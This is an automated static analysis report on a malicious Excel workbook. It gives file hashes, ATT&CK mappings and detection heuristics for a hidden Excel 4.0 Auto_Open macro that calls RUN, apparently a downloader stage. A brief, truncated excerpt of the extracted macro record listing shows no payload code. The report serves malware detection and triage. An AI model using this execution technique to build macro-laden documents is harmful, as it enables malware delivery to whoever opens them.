Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5d3130bdad11b65…

MALICIOUS

Office (OLE)

Size: 175.5 KB
Created: 2020-05-12 12:42:25
Authoring application: Microsoft Excel
First seen: 2020-09-15
MD5: 0ad3f23aa3e15b6e730734835a48178a
SHA-1: 0264fa49dd9e50248877842fec595d71d927340c
SHA-256: b5d3130bdad11b65f2e4e2997f0746739bd9d15f9e5ffbbcd1395960126ab615
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open entry, which is a known method for executing arbitrary code upon opening the workbook. The dangerous formula APIs, specifically RUN, suggest the macro is intended to execute external commands. This points to a downloader or initial execution stage for a more complex attack.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME)
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN)
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126497 bytes
SHA-256 of the extracted file: 4d8b689e38543ca3534d5588512b919b1cdfe66610b6a2375ae3e0bfd3891ad9
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!ET6679 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
... (truncated)